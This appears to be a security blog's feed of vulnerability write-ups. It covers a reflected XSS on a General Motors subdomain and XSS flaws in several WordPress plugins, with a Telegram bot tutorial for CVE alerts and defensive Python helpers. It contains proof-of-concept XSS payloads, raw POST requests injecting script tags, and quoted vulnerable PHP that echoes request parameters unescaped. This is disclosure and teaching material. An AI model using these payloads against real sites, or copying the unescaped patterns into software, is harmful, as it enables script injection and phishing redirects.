SecurityTrooper
https://securitytrooper.com/en/
Feed built Sun, 06 Dec 2020 00:27:05 +0000

Cross Site Scripting (XSS) Reflected in one of the subdomains of “General Motors” (Bugbounty)
https://securitytrooper.com/en/cross-site-scripting-xss-reflected-in-one-of-the-subdomains-of-general-motorsbugbounty
Sun, 06 Dec 2020 00:24:05 +0000
The entry was first published on SecurityTrooper.

In this post I show you how I found a reflected Cross Site Scripting (XSS) in one of the subdomains of “General Motors”.

The first thing to make clear is that a company enrolled in a bug bounty program (in this case on hackerone.com) has given permission for its in-scope assets to be tested. Remember that if a company is not in such a program and we attack it, we can get into trouble, and we must notify them before publishing any vulnerability.

Being in one of these programs also means the main site has already been tested by many people, so the chances of finding a vulnerability there are very low.

For this reason it is advisable to enumerate the company's subdomains, which increases the chances of finding one of the OWASP Top 10 vulnerabilities.

In this case, I used the Sublist3r script (https://github.com/aboul3la/Sublist3r) to list the gm.com subdomains.

After weeks of searching I focused on the subdomain supply.eur.gm.com.

This subdomain caught my attention because it looks like an old website.

After a lot of tests (user enumeration, directory listing, SQLi…) I found that its error handling was incomplete: when an error was forced, the error page reflected the full text of the requested URL.

Taking advantage of this, I injected JavaScript through the URL, since the values it contained were not filtered or encoded before being written into the page.

Finally, I prepared two proofs of concept to send to the bug bounty program that GM runs on https://www.hackerone.com/

[POC 1] Payload: <img%20src=a%20onerror=alert("XSS")>

[POC 2] Payload: <img onerror=javascript:window.location.replace('http:www.google.com') src="x">

Reflected XSS of this kind lets an attacker, for example, send a victim a crafted link on the legitimate subdomain that redirects them to a cloned website, turning a trusted gm.com host into the landing page of a phishing attack.
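What the post describes, an error page that echoes the request back into the HTML, can be confirmed before guessing at payloads. The following is an added Python example (my own, not the author's tooling; the marker format, the probe_path helper and the sample pages are assumptions or constructed) that sends a random marker wrapped in angle brackets and classifies whether it came back raw, entity-encoded, or not at all. Only the raw case is the precondition for the two PoCs above, and the live probe should only be pointed at hosts you are authorised to test.

```python
# Added example: reflection probe for verbose error pages (not code from the post).
import html
import secrets
import urllib.error
import urllib.parse
import urllib.request


def make_marker() -> str:
    """Random token so a hit in the response cannot be a coincidence."""
    return "st" + secrets.token_hex(4)


def classify_reflection(body: str, marker: str) -> str:
    """How did the probe string <marker> come back in the response body?

    'raw'      the angle brackets survived: request text lands in an HTML
               context unencoded, the precondition for the <img ... onerror>
               payloads used as PoCs above
    'encoded'  the marker is present but the brackets were entity-encoded or
               stripped, so markup does not get through
    'absent'   the response does not echo the marker at all
    """
    probe = "<" + marker + ">"
    if probe in body:
        return "raw"
    if marker in body:
        return "encoded"
    return "absent"


def probe_path(base_url: str, timeout: float = 10.0):
    """Request base_url/<marker> and classify the reply (live network call).

    An error status is expected here, since the interesting page is the error
    page itself, so HTTPError bodies are read instead of being discarded.
    Returns (marker, classification).
    """
    marker = make_marker()
    url = base_url.rstrip("/") + "/" + urllib.parse.quote("<" + marker + ">", safe="")
    req = urllib.request.Request(url, headers={"User-Agent": "reflection-probe/0.1"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        body = err.read().decode("utf-8", "replace")
    return marker, classify_reflection(body, marker)


# Constructed responses standing in for the subdomain's error page: one that
# echoes the path verbatim and one that entity-encodes it.
SAMPLE_MARKER = "st0badc0de"
SAMPLE_RAW = ("<html><body><h1>Server Error</h1>"
              "<p>No handler for /supply/<st0badc0de></p></body></html>")
SAMPLE_ENCODED = ("<html><body><h1>Server Error</h1>"
                  "<p>No handler for /supply/" + html.escape("<st0badc0de>")
                  + "</p></body></html>")

if __name__ == "__main__":
    print(classify_reflection(SAMPLE_RAW, SAMPLE_MARKER))
    print(classify_reflection(SAMPLE_ENCODED, SAMPLE_MARKER))
```

An "encoded" result is not a dead end (other contexts on the page may still be injectable), but a "raw" result is the one that turns the URL echo into the image-onerror PoCs shown above.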

Unfortunately, the compensation from GM for the work done was zero, and this often happens.

Smush Image 2.7.4.1 Directory Traversal CVE-2017-15079
https://securitytrooper.com/en/smush-image-2-7-4-1-directory-traversal-cve-2017-15079-2
Fri, 09 Feb 2018 10:48:00 +0000

I'll talk about a Directory Traversal that I found in a well-known plugin, but I have to say it is a bit limited because it only lists folders.
Here's a video where I made a PoC.

I'm sorry I didn't put more information about the code used.

My first CVE by 2018 CVE-2018-5316
https://securitytrooper.com/en/my-first-cve-by-2018-cve-2018-5316
Fri, 09 Feb 2018 10:31:53 +0000

Although I tracked the vulnerability down last year, MITRE assigned the CVE in 2018. It is a Cross-site scripting in the plugin “SagePay Server Gateway for WooCommerce” version 1.0.7.

This vulnerability is in the “page” parameter of the file /wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php, which is written into the form's action attribute without any validation or escaping.

<?php    
    
    $res =  '<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">' .
            '<html><head>' .
            '<script type="text/javascript"> function OnLoadEvent() { document.form.submit(); }</script>' .
            '<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />' .
            '<title>3D-Secure Redirect</title></head>' . 
            '<body OnLoad="OnLoadEvent();">' .
            '<form name="form" action="'. urldecode($_GET["page"]) . '" method="POST"  target="_top" >' .
            '<noscript>' .
            '<center><p>Please click button below to Authenticate your card</p><input type="submit" value="Go"/></p></center>' .
            '</noscript>' .
            '</form></body></html>';
            
    echo $res;
?>

The following screenshot verifies that the code is executed correctly.

Z-URL Preview (XSS) CVE-2017-18012
https://securitytrooper.com/en/z-url-preview-xss-2
Thu, 21 Dec 2017 08:16:14 +0000

A few days ago I finally got in touch with the developer of the “Z-URL Preview” plugin and told him about a Cross-site scripting in version 1.6.1.

The vulnerability is in the “url” parameter handled by the file /wp-content/plugins/z-url-preview/class.zlinkpreview.php. As the code below shows, the constructor of the “ZLinkPreview” class only prepends “http://” when a scheme is missing and stores the value unchanged, and the template at the bottom of the file then echoes $zlinkPreview->url into href attributes without esc_url() or esc_attr(), so a quote in the parameter breaks out of the attribute and the rest is rendered as markup. Note also that the same parameter is passed straight to curl (with CURLOPT_FOLLOWLOCATION enabled) and that getTitle() and getDescription() echo the fetched page's title and description without escaping, so the output also depends on whatever the remote page contains.

<?php

class ZLinkPreview {

    var $description;
    var $title;
    var $image = array();
    var $url;
    var $html;
    var $parsemode;
    var $curlerrno;
    var $curlerr;
    var $curlinf = array();
    var $htmlblank;

    function __construct($url) {

        if (!preg_match("~^(?:f|ht)tps?://~i", $url)) {
            $url = "http://" . $url . '/';
        }

        $this->url = $url;
        $this->getHTML();
    }

    function setParseMode($m = "r") {
        $this->parsemode = $m;
    }

    function getHTML() {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $this->url);
        curl_setopt($ch, CURLOPT_NOBODY, false);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_CAINFO, dirname(__FILE__) . "/cacert.pem");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $this->html = curl_exec($ch);
        $this->curlinf = curl_getinfo($ch);
        $this->curlerr = curl_error($ch);
        $this->curlerrno = curl_errno($ch);

        if (!$this->html) {
            //echo 'Error: ' . curl_error($ch);
            //die();
            $this->htmlblank = true;
        }
        curl_close($ch);
//        $this->html = str_replace("<head>", "<head><base href=\"$this->url\">", $this->html);
    }

    function getcurlerrno() {
        echo $this->curlerrno;
    }

    function getcurlerr() {
        echo $this->curlerr;
    }

    function getcurlinf() {
        print_r($this->curlinf);
    }

    function getDescription() {
        if ($this->parsemode == "d") {
            $res = "";
            $dom = new DOMDocument();
            @$dom->loadHTML($this->html);
            foreach($dom->getElementsByTagName('meta') as $meta) {  // prefer og:description
                if ($meta->getAttribute('property') == "og:description") {
                    $res = $meta->getAttribute('content');
                    break;
                }
            }
            if ($res == "") {  // failback to basic description
                foreach($dom->getElementsByTagName('meta') as $meta) {
                    if ($meta->getAttribute('name') == "description") {
                        $res = $meta->getAttribute('content');
                        break;
                    }
                }
            }
            if ($res == "") {  // failback to first p if meta's missing or blank
                $res = $dom->getElementsByTagName('p')->item(0)->nodeValue;
            }
            echo $res;
        } else {
            if (preg_match_all('/<meta(?=[^>]*name="description")\s[^>]*content="([^>]*)"/si', $this->html, $matches)) {
                foreach ($matches[1] as $key => $content) {
                    echo $content;
                }
            } else if (preg_match_all('/<meta(?=[^>]*name="og:description")\s[^>]*content="([^>]*)"/si', $this->html, $matches)) {
                foreach ($matches[1] as $key => $content) {
                    echo $content;
                }
            }
        }
    }

    function getTitle() {
        if ($this->parsemode == "d") {
            $title = "";
            $dom = new DOMDocument();
            @$dom->loadHTML($this->html);
            foreach($dom->getElementsByTagName('meta') as $meta) {  // prefer og:title
                if ($meta->getAttribute('property') == "og:title") {
                    $title = $meta->getAttribute('content');
                    break;
                }
            }
            if ($title == "") {  // failback to title if og:title missing or blank
                $title = $dom->getElementsByTagName('title')->item(0)->nodeValue;
            }
            if ($title == "") {  // failback to h1 if title missing or blank
                $title = $dom->getElementsByTagName('h1')->item(0)->nodeValue;
            }
            echo $title;
        } else {
            // if (preg_match("/<title>(.+)<\/title>/si", $this->html, $matches)) { // Changed due to issue with BBC news
            if (preg_match("/<title>(.+)<\/title>/i", $this->html, $matches)) {
                echo $matches[1];
            } else {
                $dom = new DOMDocument();
                @$dom->loadHTML($this->html);
                echo $dom->getElementsByTagName('title')->item(0)->nodeValue;
            }
        }
    }

    function getImage($multiple = false) {
        if ($this->parsemode == "d") {
                $res = "";
                $dom = new DOMDocument();
                @$dom->loadHTML($this->html);
                foreach($dom->getElementsByTagName('meta') as $meta) {  // prefer og:image
                        if ($meta->getAttribute('property') == "og:image") {
                                $res = $meta->getAttribute('content');
                                break;
                        }
                }
                if ($res == "") {  // failback to first img if og:image missing or blank
                        $res = @$dom->getElementsByTagName('img')->item(0)->getAttribute('src');
                }
                if ($res != "") {  // only try and clean up the url if an image was found
                        // we need the fqdn without the trailing /
                        $urlo = rtrim ($this->url,"/");

                        $res = preg_replace("/&#?[a-z0-9]{2,8};/i", "", $res);
                        if (substr($res, 0, 4) == "http") { // if the url starts with http we're done
                                $reso = $res;
                        } else {
                                if (substr($res, 0, 1) == "/") {  // if url starts with / then it could be an absolute path
                                        if (substr($res, 0, 2) == "//") {  // ok, not absolute, but for dual-mode http(s) sites
                                                $reso = "http:" . $res;
                                        } elseif (substr($res, 0, 3) == "://") {  // for dual-mode http(s) sites with :
                                                $reso = "http" . $res;
                                        } else {  // absolute to prepend fqdn
                                                $reso = $urlo . $res;
                                        }
                                } else {  // doesn't start with a / so a relative path - for now assume a / base path
                                        $reso = $urlo . "/" . $res;
                                }
                        }
                }
                echo $reso;
        } else {
            /* First we will check if facebook opengraph image tag exist */
            if (preg_match_all('/<meta(?=[^>]*property="og:image")\s[^>]*content="([^>]*)"/si', $this->html, $matches)) {
                foreach ($matches[1] as $key => $content) {
                    $image[] = preg_replace("/&#?[a-z0-9]{2,8};/i", "", $content);
                    if ($key == 5)
                        break;
                }
            }

            /* If not then we will get the first image from the html source */
            else if (preg_match_all('/<img [^>]*src=["|\']([^"|\']+)/i', $this->html, $matches)) {
                foreach ($matches[1] as $key => $value) {
                    if (strpos($value, 'http') === false) {
                        // If trailing slash is missing from domain AND image path does not start with slash, insert one - technically should check for base href, but later :-)
                        if ((substr($this->url, -1) != "/") && (substr($value, 0, 1) != "/")) {
                            $image[] = $this->url . '/' . preg_replace("/&#?[a-z0-9]{2,8};/i", "", $value);
                        } else {
                            $image[] = $this->url . preg_replace("/&#?[a-z0-9]{2,8};/i", "", $value);
                        }
                    } else {
                        $image[] = preg_replace("/&#?[a-z0-9]{2,8};/i", "", $value);
                    }

                    if ($key == 5)
                        break;
                }
            }
            $image_index = (isset($_GET['image_no'])) ? $_GET['image_no'] - 1 : 0;
            echo (!$multiple) ? $image[$image_index] : str_replace(array("\\", "\"", " "), array("", "", ""), json_encode($image));
        }
    }

}

$zlinkPreview = new ZLinkPreview($_GET['url']);
define('SHORTINIT', true);
require_once('../../../wp-load.php');
$linkmode = get_option('zurlpreview_linkmode');
switch ($linkmode) {
    case "target-blank":
        $linkmodehtml = ' target="_blank"';
        break;
    case "target-newwindow":
        $linkmodehtml = ' target="newwindow"';
        break;
    case "rel-external":
        $linkmodehtml = ' rel="external"';
        break;
    default:
        $linkmodehtml = '';
}
$zlinkPreview->setParseMode(get_option('zurlpreview_parsemode'));
?>
<div id="at_zurlpreview">
            <?php
            if ($zlinkPreview->htmlblank == true) {
            ?>
            <p class="imgd">Error No: <?php $zlinkPreview->getcurlerrno();  ?></p>
            <p class="imgd">Error: <?php $zlinkPreview->getcurlerr();  ?></p>
            <p class="imgd">Info: <?php $zlinkPreview->getcurlinf();  ?></p>
            <?php
            } else {
            ?>
            <?php
            if (get_option('zurlpreview_noheadtag') != "Yes") {
                   if (get_option('zurlpreview_linkheader') == "Yes") {
                    ?>
                    <h2><a href="<?php echo $zlinkPreview->url; ?>" <?php echo $linkmodehtml; ?>><?php $zlinkPreview->getTitle();  ?></a></h2>
                    <?php
                } else {
                    ?>
                    <h2><?php $zlinkPreview->getTitle();  ?></h2>
                    <?php
                }
            }
            ?>
            <h3 style="display:none;"><?php $zlinkPreview->getTitle();  ?></h3>
            <?php
            if (get_option('zurlpreview_noimage') != "Yes") {
                   if (get_option('zurlpreview_linkimage') == "Yes") {
                    ?>
                    <p class="imgp"><a href="<?php echo $zlinkPreview->url; ?>" <?php echo $linkmodehtml; ?>><img data-src = "<?php $zlinkPreview->getImage(1); ?>" src="<?php $zlinkPreview->getImage();  ?>"></a></p>
                    <?php
                } else {
                    ?>
                    <p class="imgp"><img data-src = "<?php $zlinkPreview->getImage(1); ?>" src="<?php $zlinkPreview->getImage();  ?>"></p>
                    <?php
                }
            }
            if (get_option('zurlpreview_nointro') != "Yes") {
            ?>
            <p class="imgd"><?php $zlinkPreview->getDescription();  ?></p>
            <?php
            }
            if (get_option('zurlpreview_titlelink') == "Yes") {
            ?>
            <p class="imgs"><a href="<?php echo $zlinkPreview->url; ?>" <?php echo $linkmodehtml; ?>><?php echo htmlspecialchars($zlinkPreview->getTitle());  ?></a></p>
            <?php
            } else {
            ?>
            <p class="imgs"><?php echo get_option('zurlpreview_linktxt'); ?> <a href="<?php echo $zlinkPreview->url; ?>" <?php echo $linkmodehtml; ?>><?php echo preg_replace('#^https?://#', '', $zlinkPreview->url);  ?></a></p>
            <?php
            }
            ?>

            <?php } ?>
</div>

The following screenshot verifies that the code is executed correctly.

The code inside the HTML body is checked in the following screenshot.
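The SagePay redirect.php above writes the page parameter into a form action, and the Z-URL Preview template writes $zlinkPreview->url into href attributes. Both are URL-valued attributes, where escaping alone is not enough: a javascript: URL passes through HTML escaping untouched. The following is an added Python example (not code from either plugin; the function names, the allowed-host list and the acs.example host are my own) that puts a sink modelled on redirect.php next to a hardened version that validates the scheme, and optionally the host, before escaping for the attribute context. One further check on the original: PHP has already URL-decoded $_GET["page"], so the extra urldecode() decodes a second time and a double-encoded quote (%2522) also reaches the attribute.

```python
# Added example (not the plugins' code): URL-valued attribute sinks, vulnerable
# and hardened.
import html
import urllib.parse
from typing import Iterable, Optional

ALLOWED_SCHEMES = {"http", "https"}


def render_form_vulnerable(page: str) -> str:
    """Mirrors the pattern in redirect.php: a decoded request parameter is
    concatenated into the action attribute with no validation or escaping."""
    return ('<form name="form" action="' + urllib.parse.unquote(page)
            + '" method="POST" target="_top"></form>')


def safe_url(value: str, allowed_hosts: Optional[Iterable[str]] = None) -> Optional[str]:
    """Accept only absolute http(s) URLs, optionally pinned to known hosts.

    Returns the URL to use, or None if it must not be used. The scheme check is
    what stops javascript: and data: URLs, which html.escape() would pass
    through intact; the host check is what stops the form posting the card
    data to an attacker's server.
    """
    parsed = urllib.parse.urlsplit(value.strip())
    if parsed.scheme.lower() not in ALLOWED_SCHEMES or not parsed.netloc:
        return None
    if allowed_hosts is not None:
        if (parsed.hostname or "").lower() not in {h.lower() for h in allowed_hosts}:
            return None
    return parsed.geturl()


def render_form_hardened(page: str, allowed_hosts=None, fallback: str = "/") -> str:
    """Validate the URL first, then escape it for the attribute context."""
    url = safe_url(page, allowed_hosts) or fallback
    return ('<form name="form" action="' + html.escape(url, quote=True)
            + '" method="POST" target="_top"></form>')


# Constructed inputs: the attribute break-out used in this blog's PoCs, a
# javascript: URL that escaping alone would not stop, and a legitimate-looking
# gateway URL (acs.example is a placeholder host).
PAYLOAD_BREAKOUT = '"><script>alert(1)</script>'
PAYLOAD_SCHEME = "javascript:alert(document.domain)"
LEGIT = "https://acs.example/3ds?MD=1&PaReq=abc"

if __name__ == "__main__":
    print(render_form_vulnerable(PAYLOAD_BREAKOUT))
    print(render_form_hardened(PAYLOAD_BREAKOUT))
    print(render_form_hardened(LEGIT, allowed_hosts=["acs.example"]))
```

The WordPress equivalents are esc_url() for the href/action value (it also rejects javascript: and similar schemes) combined with esc_attr() for any other attribute, but neither replaces the host allowlist for a payment redirect.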

Wunderbar Basic (XSS)
https://securitytrooper.com/en/wunderbar-basic-xss-2
Wed, 20 Dec 2017 07:42:45 +0000

I keep finding XSS in WordPress plugins; this time the plugin is “Wunderbar Basic” version 1.1.3.

The bug is in the “home” parameter of the file wp-content/plugins/wunderbar-basic-wysiwyyg-front-end-editor/wb-adminbar.php which, as the following capture shows, echoes $_REQUEST['home'] straight into an href and an img src attribute with no escaping.

<div id="wbinterior" >
<div id="wunderbarlogo"  >
    <a class='wblogobutton thickbox' title='Wunderbar Help' href='<?php echo $_REQUEST['home']?>help.html?width=500&height=300&TB_iframe=true' target='_blank'>
        <img src="<?php echo $_REQUEST['home']?>images/wb-logo-rev.png" alt="The Wunderbar" />
        <span id='wbcmds'>&nbsp; &nbsp; HELP / UPGRADE</span>
    </a>
    </div>
<div id="fakeeditarea" style='display:none'></div>


The malicious code runs without problems.

This screenshot shows the code inside the HTML body.

  • Publication in Packetstormsecurity:
    https://packetstormsecurity.com/files/145434/WordPress-Wunderbar-Basic-1.1.3-Cross-Site-Scripting.html

Pinterest Badge (XSS)
https://securitytrooper.com/en/pinterest-badge-xss-2
Tue, 19 Dec 2017 09:49:44 +0000

Today I will tell you about another Cross-site scripting that I discovered in the “Pinterest Badge” plugin, version 1.8.0.

The flaw is in the “uid” parameter of the file /wp-content/plugins/pinterest-badge/pinterestbadgedetails.php which, as can be seen in the following capture, lacks the escaping needed to prevent code injection.

The malicious code runs without problems.

This screenshot shows the code inside the HTML body.

Send the latest CVEs to your Telegram
https://securitytrooper.com/en/send-the-latest-cves-to-your-telegram
Mon, 18 Dec 2017 11:49:42 +0000

In this article I will explain how to create a bot that allows you to be informed of the latest CVEs that are being published at the moment.

The first thing we have to do is install the Telegram Python library using pip.

pip install python-telegram-bot

To develop the bot you have to use “The BotFather” (https://core.telegram.org/bots), a bot run by Telegram that registers new bots and issues the API token our code will use.

To do this, open the “BotFather” chat in any Telegram client (iOS, Android or Windows Phone, or the Mac, Windows, Linux and web versions).
In this case I will use the web version (https://web.telegram.org/).


Once in that chat, send “/start”, then “/newbot”, and then enter the name and username of your bot; remember that the username must end in “bot” (for example “_bot”).

The message above confirms that everything was created correctly.
It is very important that you have a chat open with your bot, because you will need to know the chat_id you share with it.
There are surely simpler ways to get this “chat_id”, but I will explain the one I use.

This script will get you the chat_id, but for it to work you must previously have talked to your bot (e.g. from the bot's chat: t.me/XXXXXXXX_bot).
Remember to put in the TOKEN obtained earlier.

# -*- coding: utf-8 -*-
# Import the python-telegram-bot library (synchronous API of versions 12/13;
# in version 20 and later these Bot methods are coroutines)
import telegram

# API TOKEN issued by BotFather
TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
bot = telegram.Bot(token=TOKEN)

# getUpdates returns the recent messages sent to the bot; each one carries
# the chat_id of the conversation it came from
updates = bot.get_updates()
print([u.message.chat_id for u in updates])

The result will look something like this:

The chat_id will look like 17XXXXX. It can also be a negative number (e.g. -17XXXXXX); that is the form group chats have.

Now, with your chat_id and TOKEN, we can use this script to forward the latest CVEs as they are tweeted by the @CVEnew Twitter account.

# -*- coding: utf-8 -*-
# Import requests (HTTP), BeautifulSoup (HTML parsing) and the Telegram library
import requests
import bs4
import telegram

# API TOKEN issued by BotFather
TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
mi_bot = telegram.Bot(token=TOKEN)

# Telegram chat ID obtained with the previous script
chat_id = 1000000000000

# Name of the account whose tweets we want
account = "CVEnew"

# Fetch the public Twitter page of the account
result = requests.get("https://twitter.com/" + account, timeout=30)
result.raise_for_status()
c = result.content

# Parse the HTML with BeautifulSoup
soup = bs4.BeautifulSoup(c, "html.parser")

# Each tweet was rendered as <li class="stream-item"> in the 2017 Twitter web layout
for div in soup.find_all("li", {"class": "stream-item"}):
    # Twitter's unique ID for the tweet (useful as a dedupe key)
    item_id = div["data-item-id"]

    # Tweet text
    content = str(div.find("p", {"class": "TweetTextSize"}).text)

    # Send the result to my Telegram chat
    mi_bot.send_message(chat_id=chat_id, text="@" + account + " -- " + content)

Remember that this script is only an example of how to fetch the tweets of the CVEnew account; it collects them once and sends them all. For a real notifier you would run it from a cron job and keep a small database of the item_ids already sent, so that nothing is sent twice. Note also that it parses the server-rendered HTML twitter.com used in 2017; the selectors will need updating for whatever markup or API the source serves today.
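On the point above about a cron job and a database: the following is an added Python example (my own, not part of the original post) of the small piece of state the script needs so that a periodic run only forwards tweets it has not sent before. It keys on Twitter's data-item-id, which the scraping loop already extracts, and marks an id as seen only after the send callback returns, so a failed Telegram delivery is retried on the next run rather than silently lost. The sample items are constructed.

```python
# Added example (not from the original post): remember what was already sent.
import sqlite3
from typing import Callable, Iterable, Tuple


def open_state(path: str = "cve_seen.db") -> sqlite3.Connection:
    """Open (or create) the SQLite file that remembers which items were sent."""
    conn = sqlite3.connect(path)
    conn.execute(
        "CREATE TABLE IF NOT EXISTS seen ("
        " item_id TEXT PRIMARY KEY,"
        " first_seen TEXT NOT NULL DEFAULT CURRENT_TIMESTAMP)"
    )
    conn.commit()
    return conn


def notify_new(conn: sqlite3.Connection,
               items: Iterable[Tuple[str, str]],
               send: Callable[[str], None]) -> int:
    """Forward every (item_id, text) not seen before; return how many were sent.

    The id is committed as seen only after send() returns, so if Telegram is
    unreachable the exception propagates, that item is not marked, and the
    next cron run retries from it. Pass the items oldest-first if the order
    in the chat matters.
    """
    sent = 0
    for item_id, text in items:
        if conn.execute("SELECT 1 FROM seen WHERE item_id = ?", (item_id,)).fetchone():
            continue
        send(text)
        conn.execute("INSERT INTO seen (item_id) VALUES (?)", (item_id,))
        conn.commit()
        sent += 1
    return sent


# Constructed stand-in for the (item_id, text) pairs the scraping loop produces.
SAMPLE_ITEMS = [
    ("100", "@CVEnew -- first tweet (constructed)"),
    ("101", "@CVEnew -- second tweet (constructed)"),
    ("102", "@CVEnew -- third tweet (constructed)"),
]

if __name__ == "__main__":
    db = open_state(":memory:")
    print(notify_new(db, SAMPLE_ITEMS, print))  # 3 on the first run
    print(notify_new(db, SAMPLE_ITEMS, print))  # 0 on the second
```

In the cron version, replace print with a callable that does the delivery, e.g. lambda text: mi_bot.send_message(chat_id=chat_id, text=text), and feed it the (item_id, content) pairs collected by the loop in the script above, reversed so the oldest tweet goes out first.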

WP Mailster (XSS) CVE-2017-17451
https://securitytrooper.com/en/wp-mailster-xss-cve-2017-17451-2
Mon, 18 Dec 2017 11:45:10 +0000

Today I will tell you about another Cross-site scripting that I discovered in the plugin “WP Mailster” version 1.5.4.0 by the company Brandtoss (https://wpmailster.com/).

The bug is in the “mes” parameter of the file wp-mailster/view/subscription/unsubscribe2.php which, as the following snippet shows, echoes $_GET['mes'] into the page body with no escaping.

  <h2 class="componentheading mailsterUnsubscriberHeader">Unsubscription</h2>
    <div class="contentpane">
        <div id="mailsterContainer">
            <div id="mailsterUnsubscriber">
                <div id="mailsterUnsubscriberDescription"><?php echo $_GET['mes']; ?></div>
            </div>
        </div>
    </div>

The malicious code runs without problems.

This screenshot shows the code inside the HTML body.

Emag Marketplace (XSS) CVE-2017-17043
https://securitytrooper.com/en/emag-marketplace-xss-cve-2017-17043-2
Mon, 18 Dec 2017 11:43:14 +0000

Another Cross-site scripting, this time in the plugin “Emag Marketplace Connector” version 1.0.1 by the company Zitec (https://zitec.com/).

The vulnerable parameter is “post”, used on line 1 of the file awb-meta-box.php in the folder /plugins/emag-marketplace-connector/templates/order/, where it is echoed into the value attribute of a hidden input without escaping:

<input type="hidden" name="emkp_awb[order_id]" value="<?php echo $_GET['post']; ?>"/>

Using this vulnerability we inject our malicious code and check that it is actually executed.

This screenshot shows the code inside the HTML body.

Duplicator Migration (XSS) CVE-2017-16815
https://securitytrooper.com/en/duplicator-migration-xss-cve-2017-16815-2
Mon, 18 Dec 2017 11:40:54 +0000

I keep finding Cross-site scripting in WordPress plugins; I'm going to have to automate it somehow :).
This time it is in the plugin “Duplicator Migration” version 1.2.28 (https://es.wordpress.org/plugins/duplicator/), which is active on more than 1 million WordPress sites and is developed by Snapcreek (https://snapcreek.com).
It can be exploited through two attack vectors.
From the file view.step4.php (the url_new POST parameter):

POST /wordpress//wp-content/plugins/duplicator/installer/build/view.step4.php HTTP/1.1
Host: localhost
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.8
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

url_new="><script>alert(1)</script>demo

From the file view.step2.php (the logging POST parameter):

POST /wordpress//wp-content/plugins/duplicator/installer/build/view.step2.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.8
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

logging="><script>alert(1)</script>demo

I'm sorry I didn't show any capture of the XSS execution, but I didn't need to because the Snapcreek developers didn't ask me for one.
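The Wunderbar, WP Mailster and Emag Marketplace snippets earlier on this page all share one shape: a request superglobal echoed straight into HTML. On the remark above about automating the hunt, the following is an added Python example (my own, not the author's tooling or any plugin's code) that walks a plugin tree and reports echo/print statements that reference $_GET, $_POST, $_REQUEST or $_COOKIE without passing through an escaper such as esc_attr(), esc_html(), esc_url() or htmlspecialchars(). It is a line-level heuristic: a value copied into a variable and echoed later (the SagePay case, where the concatenation is built into $res and echoed afterwards) is missed, so treat hits as candidates to verify by hand, not as findings. The sample PHP is constructed from the sinks quoted on this page.

```python
# Added example (not from the post): grep-style finder for raw superglobal echoes.
import re
from pathlib import Path
from typing import List, Tuple

# An echo/print statement up to the next ';' or closing '?>' on the same line.
STATEMENT = re.compile(r"\b(?:echo|print)\b(.*?)(?:;|\?>|$)", re.IGNORECASE)
# A request superglobal being indexed inside that statement.
SUPERGLOBAL = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\s*\[")
# Escapers/casts whose presence in the same expression we accept as a fix.
ESCAPER = re.compile(
    r"\b(?:esc_attr|esc_html|esc_url|esc_js|esc_textarea|htmlspecialchars|"
    r"htmlentities|intval|absint|wp_kses(?:_post)?)\s*\(",
    re.IGNORECASE,
)


def scan_source(source: str, name: str = "<string>") -> List[Tuple[str, int, str]]:
    """Return (file, line number, stripped line) for each suspicious statement."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for stmt in STATEMENT.finditer(line):
            expr = stmt.group(1)
            if SUPERGLOBAL.search(expr) and not ESCAPER.search(expr):
                hits.append((name, lineno, line.strip()))
                break  # one report per line is enough
    return hits


def scan_tree(root: str) -> List[Tuple[str, int, str]]:
    """Scan every .php file below root (e.g. wp-content/plugins)."""
    hits = []
    for path in Path(root).rglob("*.php"):
        try:
            hits.extend(scan_source(path.read_text(errors="replace"), str(path)))
        except OSError:
            continue  # unreadable file: skip rather than abort the whole run
    return hits


# Constructed sample: lines 2-5 copy the sinks quoted on this page, line 5 is the
# SagePay concatenation that this line-level check cannot see (no echo on the
# line), and line 6 is a properly escaped echo that must not be reported.
SAMPLE_PHP = """\
<!-- constructed sample; real plugin files are scanned with scan_tree() -->
<div id="mailsterUnsubscriberDescription"><?php echo $_GET['mes']; ?></div>
<input type="hidden" name="emkp_awb[order_id]" value="<?php echo $_GET['post']; ?>"/>
<img src="<?php echo $_REQUEST['home']?>images/wb-logo-rev.png" alt="The Wunderbar" />
'<form name="form" action="'. urldecode($_GET["page"]) . '" method="POST" target="_top" >' .
<p><?php echo esc_html($_GET['mes']); ?></p>
"""

if __name__ == "__main__":
    for file, lineno, text in scan_source(SAMPLE_PHP, "sample.php"):
        print(f"{file}:{lineno}: {text}")
```

Run scan_tree("wp-content/plugins") against a local WordPress install to get a worklist; anything it reports still has to be confirmed with a request, as the earlier posts do with a screenshot.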
